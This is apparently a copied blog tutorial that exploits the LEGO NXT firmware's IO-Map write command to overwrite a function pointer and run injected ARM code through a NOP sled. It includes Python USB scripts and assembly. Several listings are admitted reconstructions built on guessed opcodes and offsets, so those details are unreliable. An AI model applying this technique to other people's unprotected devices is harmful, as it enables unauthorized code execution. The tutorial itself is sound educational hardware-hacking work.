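The original listing isn’t preserved in this copy, but with PyUSB it looks something like this (LEGO’s USB vendor ID is 0x0694, and the NXT enumerates as product 0x0002):

import usb.core

dev = usb.core.find(idVendor=0x0694, idProduct=0x0002)  # LEGO NXT
if dev is None:
    raise RuntimeError("NXT not found; check the cable, power, and permissions")
dev.set_configuration()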
Then we need to see if we can indeed access the VM (or “command”) module’s IO-Map:
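A reconstruction of the request and response (the byte layout is unpacked below):

cmd = b"\x01\x94\x01\x00\x01\x00\x00\x00\x10\x00"  # Read IO Map command
dev.write(0x01, cmd)       # bulk OUT endpoint
resp = dev.read(0x82, 64)  # bulk IN endpoint
print(bytes(resp))
# b'\x02\x94\x00\x01\x00\x01\x00\x10\x00MindstormsNXT\x00\x00\x00'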
Ah yes. Most people have not invested years into skills such as staring at hex dumps and raw data. I’ll have to give a more detailed explanation.
We want to send the “Read IO Map Command” to the NXT. This command is documented on page 20 of the “LEGO MINDSTORMS NXT Communication Protocol” document, and the request is documented to take 10 bytes. Here we’re manually inputting each of the bytes using a hexadecimal escape sequence.
The first two bytes are required to be 0x01 and 0x94: \x01\x94.
This is followed by the module ID in little-endian format: \x01\x00\x01\x00. This corresponds to a module ID of 0x00010001 which is the ID of the VM module.
When a value is stored using more than one byte, the bytes have to be stored in a particular order, just like how decimal numbers with multiple digits have to be written in a particular order. “Little-endian” is the “opposite” or “backwards” order from how Arabic numerals are written, meaning that the “first” or “leftmost” byte has the lowest place value. This byte is called the “LSB” or “least-significant byte”. The “last” or “rightmost” byte has the highest place value and is called the “MSB” or “most-significant byte”.
“Big-endian” is the opposite of little-endian and matches the order of Arabic numerals. The “endian” names are a historical artifact.
TL;DR it means you have to flip the bytes around
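Python can do the flipping for us, which is a handy way to double-check a reading:

int.from_bytes(b"\x01\x00\x01\x00", "little")  # == 0x00010001, the VM module ID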
The next two bytes \x00\x00 correspond to an offset of 0.
Finally, the last two bytes \x10\x00 correspond to a length of 0x10 or 16.
In summary, this command means “read 16 bytes from offset 0 of the VM module’s IO-Map”.
To actually send the command to the NXT, we write it to USB endpoint 1. To read the response, we send a read command to USB endpoint 0x82 (don’t worry about it).
But I am worried about it!
Understanding this requires a minimal understanding of how the USB device framework works. An excellent overview can be found here. In short, when talking to a USB device, data needs to be sent to or received from specific endpoints. A device can have multiple endpoints of different types and directions. Each endpoint is identified by an address, which can be found in the USB descriptors. The NXT uses two “bulk” endpoints, one in each direction, and their addresses are 0x01 and 0x82.
If we decode the response according to the documentation, we find that the first bytes \x02\x94 are exactly as specified under the “return package” heading.
The next byte, \x00, means that the command succeeded.
This is followed by a repeat of the module ID \x01\x00\x01\x00 and the requested length \x10\x00.
Finally, we have the data which was read: MindstormsNXT\x00\x00\x00. This data corresponds to FormatString in the code, and here it is initialized to the MindstormsNXT value that we see.
Let’s try reading that function pointer now:
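Again reconstructed, under the same assumptions as before:

cmd = b"\x01\x94\x01\x00\x01\x00\x10\x00\x04\x00"  # 4 bytes at offset 16
dev.write(0x01, cmd)
resp = dev.read(0x82, 64)
data = resp[-4:]                                   # array('B', [61, 13, 16, 0])
print(hex(int.from_bytes(bytes(data), "little")))  # 0x100d3d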
It helps to see the difference if we line up the two commands:
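(Reconstructed from the description that follows.)

b"\x01\x94\x01\x00\x01\x00\x00\x00\x10\x00"  # 16 bytes from offset 0
b"\x01\x94\x01\x00\x01\x00\x10\x00\x04\x00"  #  4 bytes from offset 16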
We’ve changed the offset from \x00\x00 to \x10\x00 (from 0 to 16). We’ve changed the length from \x10\x00 to \x04\x00 (from 16 to 4). (Remember that all the numbers are in little-endian!)
Instead of turning the response into a bytes object, we leave it as an array. In order to find the “actual data” which was read, we can either manually count all the bytes again, or we can realize that the data is going to be the last 4 bytes: [61, 13, 16, 0]. The final line of code converts this into the value of 0x100d3d. This is our function pointer, but what does this number mean?
If we look at the datasheet for the AT91SAM7S256 microcontroller and look at Figure 8-1 “SAM7S512/256/128/64/321/32/161/16 Memory Mapping”, we can see that memory addresses in the range 0x001xxxxx correspond to the internal flash memory of the chip. The value that we read, 0x100d3d, is 0xd3d bytes or about 3 KiB past the beginning of the internal flash memory. This certainly looks like a reasonable function pointer! If we modify this function pointer, we should be able to redirect code execution for “direct” commands to something else.
What, specifically, can we modify this pointer to in order to gain arbitrary code execution? On a modern system with memory protections and advanced exploit mitigations, this part of the puzzle may end up being a challenging task. However, this microcontroller has none of these features. We should be able to put in any valid address and have the microcontroller execute that address as code (as long as we’ve put valid code there).
How do you “put valid code somewhere”? What does that actually mean?
Many modern computers are designed so that the computer’s instructions can be accessed and manipulated as data. Likewise, data can be treated as instructions. This is certainly the case for the microcontroller in question here. This idea is critically important. It means that, as long as we can put some data in some location, and as long as that data happens to represent valid instructions, the CPU will be able to execute it.
This is not the case on every system. For example, the AVR architecture does not treat instruction memory and data memory as interchangeable. Modern operating systems such as Windows or Android also typically prevent accessing data as instructions without going through some extra steps. This helps protect against… exactly what we’re doing here.
The fact that we have a simple target which can freely interchange data and code and which doesn’t have modern protections makes this an excellent learning target.
What addresses can we actually modify the function pointer to? We don’t know what the code looks like (that’s the whole point of this exercise!), and we don’t know precisely how the data memory is laid out either. We can only put in one address, so what do we do?
Here’s where we get very lucky.
Inside the VM’s IO-Map, there is a MemoryPool variable corresponding to the data segment of the running NXT program. This variable is 32 KiB in size, which means that we have 32 KiB of space that we can safely fill with whatever we want (as long as no program is running).
That means that the firmware will not crash if we modify or corrupt the memory pool, since it doesn’t get accessed if no user program is running.
The NXT’s microcontroller has a total of 64 KiB of RAM. Observe that 32 KiB is half of that total. If we assume that the firmware lays out RAM starting from the lowest address and going up, and that the firmware uses more than 0 bytes of RAM (both very reasonable assumptions), there is no possible location the firmware could put this memory pool that doesn’t intersect with the address 32 KiB past the start of RAM, 0x00208000.
Since we don’t know exactly where the buffer sits in RAM, we can fill the initial part of the buffer with nop (no operation) instructions. We put our exploit code at the very end of the buffer. As long as 0x00208000 isn’t too close to the end of the memory pool, it will end up pointing somewhere in the pile of nops.
If we cause the CPU to jump to this address, the CPU will keep executing the nops until it finally hits our code. This exploitation technique is called a “NOP slide” or “NOP sled”.
In order to test this out, we need to build a bunch of scaffolding:
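The original listing isn’t preserved in this copy. A sketch under stated assumptions might look like the following; the Write IO Map opcode 0x95 mirroring the read command’s layout, the conservative chunk size, and the placeholder MemoryPool offset (which the real code would take from c_cmd.iom) are all my assumptions:

import subprocess

# Assemble nxtpwn.s into raw ARM machine code (requires ARM Binutils).
subprocess.run(["arm-none-eabi-as", "-o", "nxtpwn.o", "nxtpwn.s"], check=True)
subprocess.run(["arm-none-eabi-objcopy", "-O", "binary", "nxtpwn.o", "nxtpwn.bin"], check=True)
payload = open("nxtpwn.bin", "rb").read()

# Fill the 32 KiB pool with ARM nops (mov r0, r0 = 0xE1A00000, stored
# little-endian) and park the payload at the very end.
POOL_SIZE = 32 * 1024
pool = (b"\x00\x00\xa0\xe1" * (POOL_SIZE // 4))[: POOL_SIZE - len(payload)] + payload

MEMORY_POOL_OFFSET = 0x0000  # placeholder: the real offset comes from c_cmd.iom

def iomap_write(offset, data, chunk=32):
    # Assumes Write IO Map (0x95) mirrors the read command's layout.
    for i in range(0, len(data), chunk):
        part = data[i:i + chunk]
        cmd = (b"\x01\x95" + b"\x01\x00\x01\x00"
               + (offset + i).to_bytes(2, "little")
               + len(part).to_bytes(2, "little") + part)
        dev.write(0x01, cmd)
        dev.read(0x82, 64)  # drain the status reply

iomap_write(MEMORY_POOL_OFFSET, pool)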
This code invokes an ARM assembler to assemble code written in nxtpwn.s into binary data, fills most of the MemoryPool with nops, and then writes the assembled code at the end.
You will need to somehow install a copy of GCC and Binutils targeting ARM. Any reasonable version should do, but this is also part of “environment setup”.
To test this, we can write the most basic assembly code in nxtpwn.s:
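Something like this should do; the NXT’s ARM7TDMI implements ARMv4T, where bx lr is the standard return:

.arm
handler:
    bx lr    @ do nothing and return straight to the caller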
This is an empty function which doesn’t do anything. If we redirect the direct command handler to it, all direct commands should stop working.
How do you learn ARM assembly language?
I personally learned ARM assembly from this tutorial a long time ago. I generally think of “learning assembly” as consisting of at least two parts: learning how all CPUs work at a high level, and learning how one particular CPU architecture works.
For the first part, I started by learning x86 assembly in order to hack PC software. It’s also possible to learn from “academic” computer science materials, including free curricula focused around the RISC-V architecture. Here is an example of one I have found. It is also possible to learn this by doing retrocomputing for historical 8-bit computer systems, although those will have more differences from modern CPUs.
Given sufficient familiarity with the basics of CPUs, it’s possible to study and understand documentation specific to ARM or another architecture. Looking at the output of a C compiler really helps to build familiarity and experience.
We can use python3 -i nxtpwn.py to load the exploit code before dropping us into the Python REPL.
Before we actually trigger the exploit, let’s try running a “direct” command to make sure it works:
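For example, the documented PLAYTONE direct command (opcode 0x03), asking for a 1000 Hz tone for 500 ms, with all multi-byte values little-endian as usual:

dev.write(0x01, b"\x00\x03\xe8\x03\xf4\x01")  # direct command, PLAYTONE
print(dev.read(0x82, 64))                     # status reply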
This should make the NXT beep.
To trigger the exploit, we can enter the following:
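Using the same (assumed) Write IO Map layout as the scaffolding above, we overwrite the 4-byte pointer at offset 16:

cmd = (b"\x01\x95" + b"\x01\x00\x01\x00" + b"\x10\x00" + b"\x04\x00"
       + (0x00208000).to_bytes(4, "little"))
dev.write(0x01, cmd)  # pRCHandler now points into our nop slide
dev.read(0x82, 64)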
This replaces that pRCHandler function pointer with an address in RAM as described above. Now let’s try to make the NXT beep again:
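Re-sending the exact PLAYTONE command from before:

dev.write(0x01, b"\x00\x03\xe8\x03\xf4\x01")
print(dev.read(0x82, 64))  # silence, and a garbage reply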
This time the NXT doesn’t beep (because we’ve replaced the function which handles direct commands with an empty function) and returns different (garbage) data (because our empty function doesn’t set the output length properly either).
We have successfully achieved native ARM code execution on the NXT, on an unmodified firmware. This means that we are now free from all of the restrictions the firmware normally imposes.
Native code execution means we can access any data inside the microcontroller, including the firmware. To actually access it, we need to replace the direct command handler with a function which lets us read arbitrary memory addresses. The direct command handler turns out to be an excellent location to hijack because it is already hooked up to all the infrastructure needed to communicate to and from the PC. This greatly simplifies the work we need to do.
In the firmware source code, we can see that the original command handler normally takes three arguments: the input buffer, the output buffer, and a pointer to the length of the output. According to the ARM ABI, these values will be stored in CPU registers r0, r1, and r2 respectively.
That function is written in C. How can you replace it with a function written in assembly? What is an ABI??
C code is turned into assembly code by a compiler. If we’re not using a compiler, we can still write assembly code by hand.
When a C compiler turns code into assembly, it has to follow certain conventions in order for different parts of the program to work together properly. For example, code which needs to make a function call needs to agree with the function being called about where to put the function arguments. This information (as well as lots of other stuff we don’t care about right now) is specified as part of the ABI.
Because the ARM architecture is a RISC architecture with comparatively “many” CPU registers, functions with 4 or fewer arguments ≤ 32 bits in size will have the arguments placed into registers r0-r3.
As long as our assembly code follows the same conventions as the C code (follows the ABI), the existing firmware can call our code with no problems.
...
Read the original on arcanenibble.github.io »